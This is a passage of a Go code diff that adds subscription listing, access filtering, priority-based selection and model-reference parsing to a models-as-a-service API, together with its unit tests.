createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, 
[]string{"model-a", "model-b"}, map[string]string{ + "openshift.io/display-name": "Premium Plan", + "openshift.io/description": "High limits for production", + }), + createTestSubscriptionWithAnnotations("other-sub", []string{"other-group"}, []string{"model-a"}, nil), + }} + + router := setupListTestRouter(lister, "alice", []string{"free-users", "premium-users"}) + req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d: %s", w.Code, w.Body.String()) + } + + var result []subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 2 { + t.Fatalf("expected 2 subscriptions, got %d", len(result)) + } + + found := map[string]string{} + for _, s := range result { + found[s.SubscriptionIDHeader] = s.SubscriptionDescription + } + + if desc, ok := found["free-sub"]; !ok || desc != "Free Tier" { + t.Errorf("expected free-sub with description 'Free Tier' (fallback from display-name), got %q", desc) + } + if desc, ok := found["premium-sub"]; !ok || desc != "High limits for production" { + t.Errorf("expected premium-sub with description 'High limits for production', got %q", desc) + } +} + +func TestListSubscriptions_NoAccess(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a"}, nil), + }} + + router := setupListTestRouter(lister, "nobody", []string{"unknown-group"}) + req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d", w.Code) + } + + var result []subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + 
t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 0 { + t.Errorf("expected empty array, got %d items", len(result)) + } +} + +func TestListSubscriptionsForModel_FiltersByModel(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, map[string]string{ + "openshift.io/display-name": "Free Tier", + }), + createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a", "model-b"}, map[string]string{ + "openshift.io/display-name": "Premium Plan", + }), + }} + + router := setupListTestRouter(lister, "alice", []string{"free-users", "premium-users"}) + + // model-b is only in premium-sub + req := httptest.NewRequest(http.MethodGet, "/v1/model/model-b/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d", w.Code) + } + + var result []subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 1 { + t.Fatalf("expected 1 subscription for model-b, got %d", len(result)) + } + if result[0].SubscriptionIDHeader != "premium-sub" { + t.Errorf("expected premium-sub, got %q", result[0].SubscriptionIDHeader) + } +} + +func TestListSubscriptionsForModel_UnknownModel(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("free-sub", []string{"free-users"}, []string{"model-a"}, nil), + }} + + router := setupListTestRouter(lister, "alice", []string{"free-users"}) + + req := httptest.NewRequest(http.MethodGet, "/v1/model/nonexistent-model/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d", w.Code) + } + + var result 
[]subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 0 { + t.Errorf("expected empty array for unknown model, got %d items", len(result)) + } +} + +func TestListSubscriptions_DescriptionFallback(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("both-annotations", []string{"free-users"}, []string{"m"}, map[string]string{ + "openshift.io/display-name": "My Display Name", + "openshift.io/description": "My Description", + }), + createTestSubscriptionWithAnnotations("with-description-only", []string{"free-users"}, []string{"m"}, map[string]string{ + "openshift.io/description": "Description Only", + }), + createTestSubscriptionWithAnnotations("with-display-name-only", []string{"free-users"}, []string{"m"}, map[string]string{ + "openshift.io/display-name": "Display Name Only", + }), + createTestSubscriptionWithAnnotations("no-annotations", []string{"free-users"}, []string{"m"}, nil), + }} + + router := setupListTestRouter(lister, "alice", []string{"free-users"}) + req := httptest.NewRequest(http.MethodGet, "/v1/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d", w.Code) + } + + var result []subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 4 { + t.Fatalf("expected 4 subscriptions, got %d", len(result)) + } + + byID := map[string]subscription.SubscriptionInfo{} + for _, s := range result { + byID[s.SubscriptionIDHeader] = s + } + + // Description preferred over display-name + if byID["both-annotations"].SubscriptionDescription != "My Description" { + t.Errorf("expected description 'My Description', got %q", byID["both-annotations"].SubscriptionDescription) + 
} + if byID["both-annotations"].DisplayName != "My Display Name" { + t.Errorf("expected display_name 'My Display Name', got %q", byID["both-annotations"].DisplayName) + } + // Description only + if byID["with-description-only"].SubscriptionDescription != "Description Only" { + t.Errorf("expected description 'Description Only', got %q", byID["with-description-only"].SubscriptionDescription) + } + // Display-name falls back to subscription_description when no description + if byID["with-display-name-only"].SubscriptionDescription != "Display Name Only" { + t.Errorf("expected description fallback to display-name, got %q", byID["with-display-name-only"].SubscriptionDescription) + } + if byID["with-display-name-only"].DisplayName != "Display Name Only" { + t.Errorf("expected display_name 'Display Name Only', got %q", byID["with-display-name-only"].DisplayName) + } + // No annotations: falls back to name + if byID["no-annotations"].SubscriptionDescription != "no-annotations" { + t.Errorf("expected name fallback, got %q", byID["no-annotations"].SubscriptionDescription) + } +} + +func TestListSubscriptionsForModel_NoAccess(t *testing.T) { + lister := &mockLister{subscriptions: []*unstructured.Unstructured{ + createTestSubscriptionWithAnnotations("premium-sub", []string{"premium-users"}, []string{"model-a"}, nil), + }} + + router := setupListTestRouter(lister, "nobody", []string{"unknown-group"}) + req := httptest.NewRequest(http.MethodGet, "/v1/model/model-a/subscriptions", nil) + w := httptest.NewRecorder() + router.ServeHTTP(w, req) + + if w.Code != http.StatusOK { + t.Fatalf("expected status 200, got %d", w.Code) + } + + var result []subscription.SubscriptionInfo + if err := json.Unmarshal(w.Body.Bytes(), &result); err != nil { + t.Fatalf("failed to unmarshal response: %v", err) + } + + if len(result) != 0 { + t.Errorf("expected empty array when user has no access, got %d items", len(result)) + } +} diff --git a/maas-api/internal/subscription/selector.go 
b/maas-api/internal/subscription/selector.go index a0b469116..ea71e3c89 100644 --- a/maas-api/internal/subscription/selector.go +++ b/maas-api/internal/subscription/selector.go @@ -9,6 +9,7 @@ import ( "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/constant" "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" ) @@ -37,6 +38,9 @@ func NewSelector(log *logger.Logger, lister Lister) *Selector { // subscription represents a parsed MaaSSubscription for selection. type subscription struct { Name string + Namespace string + DisplayName string + Description string Groups []string Users []string Priority int32 @@ -44,11 +48,39 @@ type subscription struct { OrganizationID string CostCenter string Labels map[string]string + ModelRefs []ModelRefInfo +} + +// GetAllAccessible returns all subscriptions the user has access to. +func (s *Selector) GetAllAccessible(groups []string, username string) ([]*SelectResponse, error) { + if len(groups) == 0 && username == "" { + return nil, errors.New("either groups or username must be provided") + } + + subscriptions, err := s.loadSubscriptions() + if err != nil { + return nil, fmt.Errorf("failed to load subscriptions: %w", err) + } + + var accessible []*SelectResponse + for _, sub := range subscriptions { + if userHasAccess(&sub, username, groups) { + accessible = append(accessible, toResponse(&sub)) + } + } + + // Sort for deterministic ordering + sort.Slice(accessible, func(i, j int) bool { + return accessible[i].Name < accessible[j].Name + }) + + return accessible, nil } // Select implements the subscription selection logic. // Returns the selected subscription or an error if none found. -func (s *Selector) Select(groups []string, username string, requestedSubscription string) (*SelectResponse, error) { +// If requestedModel is provided, validates that the selected subscription includes that model. 
+func (s *Selector) Select(groups []string, username string, requestedSubscription string, requestedModel string) (*SelectResponse, error) { if len(groups) == 0 && username == "" { return nil, errors.New("either groups or username must be provided") } @@ -66,22 +98,51 @@ func (s *Selector) Select(groups []string, username string, requestedSubscriptio sortSubscriptionsByPriority(subscriptions) // Branch 1: Explicit subscription selection (with validation) + // Support both formats: "namespace/name" and bare "name" if requestedSubscription != "" { + // First, try exact qualified match (namespace/name) for _, sub := range subscriptions { - if sub.Name == requestedSubscription { - if userHasAccess(&sub, username, groups) { - return toResponse(&sub), nil + qualifiedName := fmt.Sprintf("%s/%s", sub.Namespace, sub.Name) + if qualifiedName == requestedSubscription { + if !userHasAccess(&sub, username, groups) { + return nil, &AccessDeniedError{Subscription: requestedSubscription} + } + // Validate subscription includes the requested model + if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) { + return nil, &ModelNotInSubscriptionError{Subscription: requestedSubscription, Model: requestedModel} } - return nil, &AccessDeniedError{Subscription: requestedSubscription} + return toResponse(&sub), nil } } + + // If no qualified match found and request is bare name (no '/'), try bare name matching + if !strings.Contains(requestedSubscription, "/") { + for _, sub := range subscriptions { + if sub.Name != requestedSubscription { + continue + } + if !userHasAccess(&sub, username, groups) { + return nil, &AccessDeniedError{Subscription: requestedSubscription} + } + if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) { + return nil, &ModelNotInSubscriptionError{Subscription: requestedSubscription, Model: requestedModel} + } + return toResponse(&sub), nil + } + } + + // Request had '/' but no match found return nil, 
&SubscriptionNotFoundError{Subscription: requestedSubscription} } - // Branch 2: Auto-selection (only if user has exactly one subscription) + // Branch 2: Auto-selection var accessibleSubs []subscription for _, sub := range subscriptions { if userHasAccess(&sub, username, groups) { + // If model is specified, only include subscriptions that contain that model + if requestedModel != "" && !subscriptionIncludesModel(&sub, requestedModel) { + continue + } accessibleSubs = append(accessibleSubs, sub) } } @@ -102,6 +163,37 @@ func (s *Selector) Select(groups []string, username string, requestedSubscriptio return nil, &MultipleSubscriptionsError{Subscriptions: subNames} } +// SelectHighestPriority returns the accessible subscription with highest spec.priority +// (then max token limit desc, then name asc for deterministic ties). +func (s *Selector) SelectHighestPriority(groups []string, username string) (*SelectResponse, error) { + if len(groups) == 0 && username == "" { + return nil, errors.New("either groups or username must be provided") + } + + subscriptions, err := s.loadSubscriptions() + if err != nil { + return nil, fmt.Errorf("failed to load subscriptions: %w", err) + } + + if len(subscriptions) == 0 { + return nil, &NoSubscriptionError{} + } + + var accessible []subscription + for _, sub := range subscriptions { + if userHasAccess(&sub, username, groups) { + accessible = append(accessible, sub) + } + } + + if len(accessible) == 0 { + return nil, &NoSubscriptionError{} + } + + sortSubscriptionsByPriority(accessible) + return toResponse(&accessible[0]), nil +} + // loadSubscriptions fetches and parses MaaSSubscription resources. 
func (s *Selector) loadSubscriptions() ([]subscription, error) { objects, err := s.lister.List() @@ -134,7 +226,14 @@ func parseSubscription(obj *unstructured.Unstructured) (subscription, error) { } sub := subscription{ - Name: obj.GetName(), + Name: obj.GetName(), + Namespace: obj.GetNamespace(), + } + + // Parse annotations for display metadata + if annotations := obj.GetAnnotations(); annotations != nil { + sub.DisplayName = annotations[constant.AnnotationDisplayName] + sub.Description = annotations[constant.AnnotationDescription] } // Parse owner @@ -163,44 +262,80 @@ func parseSubscription(obj *unstructured.Unstructured) (subscription, error) { } } - // Parse modelRefs to calculate maxLimit + // Parse modelRefs if modelRefs, found, _ := unstructured.NestedSlice(spec, "modelRefs"); found { for _, modelRef := range modelRefs { if modelMap, ok := modelRef.(map[string]any); ok { - if limits, found, _ := unstructured.NestedSlice(modelMap, "tokenRateLimits"); found { - for _, limitRaw := range limits { - if limitMap, ok := limitRaw.(map[string]any); ok { - if limit, ok := limitMap["limit"].(int64); ok { - if limit > sub.MaxLimit { - sub.MaxLimit = limit - } - } - } + ref := parseModelRef(modelMap) + for _, trl := range ref.TokenRateLimits { + if trl.Limit > sub.MaxLimit { + sub.MaxLimit = trl.Limit } } + sub.ModelRefs = append(sub.ModelRefs, ref) } } } // Parse tokenMetadata - if metadata, found, _ := unstructured.NestedMap(spec, "tokenMetadata"); found { - if orgID, ok := metadata["organizationId"].(string); ok { - sub.OrganizationID = orgID - } - if costCenter, ok := metadata["costCenter"].(string); ok { - sub.CostCenter = costCenter - } - if labelsRaw, ok := metadata["labels"].(map[string]any); ok { - sub.Labels = make(map[string]string) - for k, v := range labelsRaw { - if s, ok := v.(string); ok { - sub.Labels[k] = s + parseTokenMetadata(spec, &sub) + + return sub, nil +} + +// parseModelRef extracts a ModelRefInfo from an unstructured model ref map. 
+func parseModelRef(modelMap map[string]any) ModelRefInfo { + ref := ModelRefInfo{} + if name, ok := modelMap["name"].(string); ok { + ref.Name = name + } + if ns, ok := modelMap["namespace"].(string); ok { + ref.Namespace = ns + } + if limits, found, _ := unstructured.NestedSlice(modelMap, "tokenRateLimits"); found { + for _, limitRaw := range limits { + if limitMap, ok := limitRaw.(map[string]any); ok { + trl := TokenRateLimit{} + if limit, ok := limitMap["limit"].(int64); ok { + trl.Limit = limit + } + if window, ok := limitMap["window"].(string); ok { + trl.Window = window } + ref.TokenRateLimits = append(ref.TokenRateLimits, trl) } } } + if billingRate, found, _ := unstructured.NestedMap(modelMap, "billingRate"); found { + br := &BillingRate{} + if perToken, ok := billingRate["perToken"].(string); ok { + br.PerToken = perToken + } + ref.BillingRate = br + } + return ref +} - return sub, nil +// parseTokenMetadata extracts tokenMetadata fields from the spec into the subscription. +func parseTokenMetadata(spec map[string]any, sub *subscription) { + metadata, found, _ := unstructured.NestedMap(spec, "tokenMetadata") + if !found { + return + } + if orgID, ok := metadata["organizationId"].(string); ok { + sub.OrganizationID = orgID + } + if costCenter, ok := metadata["costCenter"].(string); ok { + sub.CostCenter = costCenter + } + if labelsRaw, ok := metadata["labels"].(map[string]any); ok { + sub.Labels = make(map[string]string) + for k, v := range labelsRaw { + if s, ok := v.(string); ok { + sub.Labels[k] = s + } + } + } } // userHasAccess checks if user/groups match subscription owner. @@ -223,20 +358,140 @@ func userHasAccess(sub *subscription, username string, groups []string) bool { return false } -// sortSubscriptionsByPriority sorts in-place by priority desc, then maxLimit desc. +// subscriptionIncludesModel checks if the subscription's modelRefs includes the requested model. +// requestedModel format: "namespace/name". 
+func subscriptionIncludesModel(sub *subscription, requestedModel string) bool { + if requestedModel == "" { + return true // no model specified, so subscription is valid + } + + // Parse the requested model (format: "namespace/name") + parts := strings.SplitN(requestedModel, "/", 2) + if len(parts) != 2 { + return false // invalid format + } + requestedNS := parts[0] + requestedName := parts[1] + + // Check if any modelRef in the subscription matches + for _, ref := range sub.ModelRefs { + if ref.Namespace == requestedNS && ref.Name == requestedName { + return true + } + } + + return false +} + +// hasModel returns true if the subscription includes the given model name. +func (s subscription) hasModel(modelID string) bool { + for _, ref := range s.ModelRefs { + if ref.Name == modelID { + return true + } + } + return false +} + +// sortSubscriptionsByPriority sorts in-place by priority desc, then maxLimit desc, then name asc. func sortSubscriptionsByPriority(subs []subscription) { sort.SliceStable(subs, func(i, j int) bool { if subs[i].Priority != subs[j].Priority { return subs[i].Priority > subs[j].Priority } - return subs[i].MaxLimit > subs[j].MaxLimit + if subs[i].MaxLimit != subs[j].MaxLimit { + return subs[i].MaxLimit > subs[j].MaxLimit + } + return subs[i].Name < subs[j].Name }) } +// ListAccessibleForModel returns subscriptions the user has access to +// that include the specified model in their modelRefs. 
+func (s *Selector) ListAccessibleForModel(username string, groups []string, modelID string) ([]SubscriptionInfo, error) { + subscriptions, err := s.loadSubscriptions() + if err != nil { + return nil, fmt.Errorf("failed to load subscriptions: %w", err) + } + + result := []SubscriptionInfo{} + for _, sub := range subscriptions { + if userHasAccess(&sub, username, groups) && sub.hasModel(modelID) { + result = append(result, toSubscriptionInfo(&sub)) + } + } + + // Sort for deterministic ordering + sort.Slice(result, func(i, j int) bool { + return result[i].SubscriptionIDHeader < result[j].SubscriptionIDHeader + }) + + return result, nil +} + +// toSubscriptionInfo converts internal subscription to a list response item. +func toSubscriptionInfo(sub *subscription) SubscriptionInfo { + desc := sub.Description + if desc == "" { + desc = sub.DisplayName + } + if desc == "" { + desc = sub.Name + } + modelRefs := sub.ModelRefs + if modelRefs == nil { + modelRefs = []ModelRefInfo{} + } + return SubscriptionInfo{ + SubscriptionIDHeader: sub.Name, + SubscriptionDescription: desc, + DisplayName: sub.DisplayName, + Priority: sub.Priority, + ModelRefs: modelRefs, + OrganizationID: sub.OrganizationID, + CostCenter: sub.CostCenter, + Labels: sub.Labels, + } +} + +// ResponseToSubscriptionInfo converts a SelectResponse to a SubscriptionInfo. +func ResponseToSubscriptionInfo(sub *SelectResponse) SubscriptionInfo { + desc := sub.Description + if desc == "" { + desc = sub.DisplayName + } + if desc == "" { + desc = sub.Name + } + modelRefs := sub.ModelRefs + if modelRefs == nil { + modelRefs = []ModelRefInfo{} + } + return SubscriptionInfo{ + SubscriptionIDHeader: sub.Name, + SubscriptionDescription: desc, + DisplayName: sub.DisplayName, + Priority: sub.Priority, + ModelRefs: modelRefs, + OrganizationID: sub.OrganizationID, + CostCenter: sub.CostCenter, + Labels: sub.Labels, + } +} + // toResponse converts internal subscription to API response. 
func toResponse(sub *subscription) *SelectResponse { + modelRefs := sub.ModelRefs + if modelRefs == nil { + modelRefs = []ModelRefInfo{} + } return &SelectResponse{ Name: sub.Name, + Namespace: sub.Namespace, + DisplayName: sub.DisplayName, + Description: sub.Description, + Priority: sub.Priority, + ModelRefs: modelRefs, OrganizationID: sub.OrganizationID, CostCenter: sub.CostCenter, Labels: sub.Labels, @@ -276,3 +531,13 @@ type MultipleSubscriptionsError struct { func (e *MultipleSubscriptionsError) Error() string { return "user has access to multiple subscriptions, must specify subscription using X-MaaS-Subscription header" } + +// ModelNotInSubscriptionError indicates the requested model is not included in the subscription. +type ModelNotInSubscriptionError struct { + Subscription string + Model string +} + +func (e *ModelNotInSubscriptionError) Error() string { + return fmt.Sprintf("subscription %s does not include model %s", e.Subscription, e.Model) +} diff --git a/maas-api/internal/subscription/selector_test.go b/maas-api/internal/subscription/selector_test.go new file mode 100644 index 000000000..b78fd0cbc --- /dev/null +++ b/maas-api/internal/subscription/selector_test.go @@ -0,0 +1,335 @@ +package subscription_test + +import ( + "errors" + "testing" + + "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured" + + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/logger" + "github.com/opendatahub-io/models-as-a-service/maas-api/internal/subscription" +) + +const defaultTestTokenRateLimit int64 = 1000 + +// fakeLister implements subscription.Lister for testing. 
+type fakeLister struct { + subscriptions []*unstructured.Unstructured + err error +} + +func (f *fakeLister) List() ([]*unstructured.Unstructured, error) { + if f.err != nil { + return nil, f.err + } + return f.subscriptions, nil +} + +func createSubscription(name string, groups []string, users []string, priority int32, tokenLimit int64, displayName, description string) *unstructured.Unstructured { + groupsSlice := make([]any, len(groups)) + for i, g := range groups { + groupsSlice[i] = map[string]any{"name": g} + } + + usersSlice := make([]any, len(users)) + for i, u := range users { + usersSlice[i] = u + } + + spec := map[string]any{ + "owner": map[string]any{ + "groups": groupsSlice, + "users": usersSlice, + }, + "priority": int64(priority), + "modelRefs": []any{ + map[string]any{ + "name": "test-model", + "tokenRateLimits": []any{ + map[string]any{ + "limit": tokenLimit, + "window": "1m", + }, + }, + }, + }, + } + + metadata := map[string]any{ + "name": name, + "namespace": "test-ns", + } + + // Add optional displayName and description as annotations + if displayName != "" || description != "" { + annotations := map[string]any{} + if displayName != "" { + annotations["openshift.io/display-name"] = displayName + } + if description != "" { + annotations["openshift.io/description"] = description + } + metadata["annotations"] = annotations + } + + return &unstructured.Unstructured{ + Object: map[string]any{ + "apiVersion": "maas.opendatahub.io/v1alpha1", + "kind": "MaaSSubscription", + "metadata": metadata, + "spec": spec, + }, + } +} + +func TestGetAllAccessible(t *testing.T) { + log := logger.New(false) + + tests := []struct { + name string + subscriptions []*unstructured.Unstructured + groups []string + username string + expectedCount int + expectedNames []string + expectedDisplayNames map[string]string // map[name]displayName + expectedDescriptions map[string]string // map[name]description + expectError bool + }{ + { + name: "user has access to single 
subscription", + subscriptions: []*unstructured.Unstructured{ + createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "Basic Tier", "Basic subscription for all users"), + }, + groups: []string{"basic-users"}, + username: "alice", + expectedCount: 1, + expectedNames: []string{"basic-sub"}, + expectedDisplayNames: map[string]string{ + "basic-sub": "Basic Tier", + }, + expectedDescriptions: map[string]string{ + "basic-sub": "Basic subscription for all users", + }, + }, + { + name: "user has access to multiple subscriptions", + subscriptions: []*unstructured.Unstructured{ + createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "Basic Tier", "Basic subscription"), + createSubscription("premium-sub", []string{"premium-users"}, nil, 20, defaultTestTokenRateLimit, "Premium Tier", "Premium subscription"), + }, + groups: []string{"basic-users", "premium-users"}, + username: "alice", + expectedCount: 2, + expectedNames: []string{"basic-sub", "premium-sub"}, + expectedDisplayNames: map[string]string{ + "basic-sub": "Basic Tier", + "premium-sub": "Premium Tier", + }, + expectedDescriptions: map[string]string{ + "basic-sub": "Basic subscription", + "premium-sub": "Premium subscription", + }, + }, + { + name: "user has no subscriptions", + subscriptions: []*unstructured.Unstructured{ + createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""), + }, + groups: []string{"other-users"}, + username: "alice", + expectedCount: 0, + expectedNames: []string{}, + }, + { + name: "no subscriptions exist", + subscriptions: []*unstructured.Unstructured{}, + groups: []string{"any-group"}, + username: "alice", + expectedCount: 0, + expectedNames: []string{}, + }, + { + name: "user matched by username", + subscriptions: []*unstructured.Unstructured{ + createSubscription("alice-sub", []string{}, []string{"alice"}, 10, defaultTestTokenRateLimit, "Alice's Subscription", "Personal 
subscription for Alice"), + }, + groups: []string{}, + username: "alice", + expectedCount: 1, + expectedNames: []string{"alice-sub"}, + expectedDisplayNames: map[string]string{ + "alice-sub": "Alice's Subscription", + }, + expectedDescriptions: map[string]string{ + "alice-sub": "Personal subscription for Alice", + }, + }, + { + name: "subscriptions without displayName and description", + subscriptions: []*unstructured.Unstructured{ + createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""), + }, + groups: []string{"basic-users"}, + username: "alice", + expectedCount: 1, + expectedNames: []string{"basic-sub"}, + expectedDisplayNames: map[string]string{ + "basic-sub": "", // Should be empty + }, + expectedDescriptions: map[string]string{ + "basic-sub": "", // Should be empty + }, + }, + { + name: "filter out subscriptions user doesn't have access to", + subscriptions: []*unstructured.Unstructured{ + createSubscription("basic-sub", []string{"basic-users"}, nil, 10, defaultTestTokenRateLimit, "", ""), + createSubscription("premium-sub", []string{"premium-users"}, nil, 20, defaultTestTokenRateLimit, "", ""), + createSubscription("admin-sub", []string{"admin-users"}, nil, 30, defaultTestTokenRateLimit, "", ""), + }, + groups: []string{"basic-users"}, + username: "alice", + expectedCount: 1, + expectedNames: []string{"basic-sub"}, + }, + } + + for _, tt := range tests { + t.Run(tt.name, func(t *testing.T) { + lister := &fakeLister{subscriptions: tt.subscriptions} + selector := subscription.NewSelector(log, lister) + + result, err := selector.GetAllAccessible(tt.groups, tt.username) + + if tt.expectError { + if err == nil { + t.Errorf("expected error, got nil") + } + return + } + + if err != nil { + t.Errorf("unexpected error: %v", err) + return + } + + if len(result) != tt.expectedCount { + t.Errorf("expected %d subscriptions, got %d", tt.expectedCount, len(result)) + return + } + + // Verify subscription names + gotNames := 
make(map[string]bool) + for _, sub := range result { + gotNames[sub.Name] = true + } + + for _, expectedName := range tt.expectedNames { + if !gotNames[expectedName] { + t.Errorf("expected subscription %q not found in results", expectedName) + } + } + + // Verify displayNames and descriptions if provided + if tt.expectedDisplayNames != nil { + for _, sub := range result { + expectedDisplayName := tt.expectedDisplayNames[sub.Name] + if sub.DisplayName != expectedDisplayName { + t.Errorf("subscription %q: expected displayName %q, got %q", sub.Name, expectedDisplayName, sub.DisplayName) + } + } + } + + if tt.expectedDescriptions != nil { + for _, sub := range result { + expectedDescription := tt.expectedDescriptions[sub.Name] + if sub.Description != expectedDescription { + t.Errorf("subscription %q: expected description %q, got %q", sub.Name, expectedDescription, sub.Description) + } + } + } + }) + } +} + +func TestGetAllAccessible_ErrorHandling(t *testing.T) { + log := logger.New(false) + + t.Run("requires groups or username", func(t *testing.T) { + lister := &fakeLister{subscriptions: []*unstructured.Unstructured{}} + selector := subscription.NewSelector(log, lister) + + _, err := selector.GetAllAccessible(nil, "") + if err == nil { + t.Error("expected error when both groups and username are empty") + } + if err.Error() != "either groups or username must be provided" { + t.Errorf("unexpected error message: %v", err) + } + }) +} + +func TestSelectHighestPriority(t *testing.T) { + log := logger.New(false) + + t.Run("picks highest priority", func(t *testing.T) { + lister := &fakeLister{subscriptions: []*unstructured.Unstructured{ + createSubscription("low-sub", []string{"g1"}, nil, 10, defaultTestTokenRateLimit, "L", "d1"), + createSubscription("high-sub", []string{"g1"}, nil, 50, defaultTestTokenRateLimit, "H", "d2"), + }} + sel := subscription.NewSelector(log, lister) + got, err := sel.SelectHighestPriority([]string{"g1"}, "") + if err != nil { + 
t.Fatalf("SelectHighestPriority: %v", err) + } + if got.Name != "high-sub" { + t.Errorf("expected high-sub, got %q", got.Name) + } + }) + + t.Run("tie on priority uses maxLimit then name", func(t *testing.T) { + lister := &fakeLister{subscriptions: []*unstructured.Unstructured{ + createSubscription("sub-a", []string{"g1"}, nil, 10, 10, "", ""), + createSubscription("sub-b", []string{"g1"}, nil, 10, 20, "", ""), + }} + sel := subscription.NewSelector(log, lister) + got, err := sel.SelectHighestPriority([]string{"g1"}, "") + if err != nil { + t.Fatalf("SelectHighestPriority: %v", err) + } + if got.Name != "sub-b" { + t.Errorf("expected sub-b (higher maxLimit), got %q", got.Name) + } + }) + + t.Run("tie on priority and maxLimit uses name asc", func(t *testing.T) { + lister := &fakeLister{subscriptions: []*unstructured.Unstructured{ + createSubscription("zebra", []string{"g1"}, nil, 5, defaultTestTokenRateLimit, "", ""), + createSubscription("alpha", []string{"g1"}, nil, 5, defaultTestTokenRateLimit, "", ""), + }} + sel := subscription.NewSelector(log, lister) + got, err := sel.SelectHighestPriority([]string{"g1"}, "") + if err != nil { + t.Fatalf("SelectHighestPriority: %v", err) + } + if got.Name != "alpha" { + t.Errorf("expected alpha (lexicographic tie-break), got %q", got.Name) + } + }) + + t.Run("no accessible subscription", func(t *testing.T) { + lister := &fakeLister{subscriptions: []*unstructured.Unstructured{ + createSubscription("other", []string{"other-group"}, nil, 10, defaultTestTokenRateLimit, "", ""), + }} + sel := subscription.NewSelector(log, lister) + _, err := sel.SelectHighestPriority([]string{"g1"}, "") + if err == nil { + t.Fatal("expected error") + } + var noSub *subscription.NoSubscriptionError + if !errors.As(err, &noSub) { + t.Fatalf("expected NoSubscriptionError, got %T %v", err, err) + } + }) +} diff --git a/maas-api/internal/subscription/types.go b/maas-api/internal/subscription/types.go index ae5511aec..ae67efc5f 100644 --- 
a/maas-api/internal/subscription/types.go +++ b/maas-api/internal/subscription/types.go @@ -5,6 +5,13 @@ type SelectRequest struct { Groups []string `json:"groups"` // User's group memberships (optional if username provided) Username string `binding:"required" json:"username"` // User's username RequestedSubscription string `json:"requestedSubscription"` // Optional explicit subscription name + RequestedModel string `json:"requestedModel"` // Optional model reference (format: namespace/name) to validate subscription includes this model +} + +// ModelRef represents a model reference in a subscription. +type ModelRef struct { + Namespace string `json:"namespace"` // Model namespace + Name string `json:"name"` // Model name } // SelectResponse contains the selected subscription details or error information. @@ -12,6 +19,11 @@ type SelectRequest struct { type SelectResponse struct { // Success fields (populated when selection succeeds) Name string `json:"name,omitempty"` // Subscription name + Namespace string `json:"namespace,omitempty"` // Subscription namespace + DisplayName string `json:"displayName,omitempty"` // Human-friendly display name for UI + Description string `json:"description,omitempty"` // Subscription description + Priority int32 `json:"priority,omitempty"` // Subscription priority + ModelRefs []ModelRefInfo `json:"modelRefs,omitempty"` // Model references with rate limits OrganizationID string `json:"organizationId,omitempty"` // Organization ID for billing CostCenter string `json:"costCenter,omitempty"` // Cost center for attribution Labels map[string]string `json:"labels,omitempty"` // Additional tracking labels @@ -21,6 +33,38 @@ type SelectResponse struct { Message string `json:"message,omitempty"` // Human-readable error message } +// SubscriptionInfo represents a subscription in list responses. +// Contains everything from the MaaSSubscription spec except owner. 
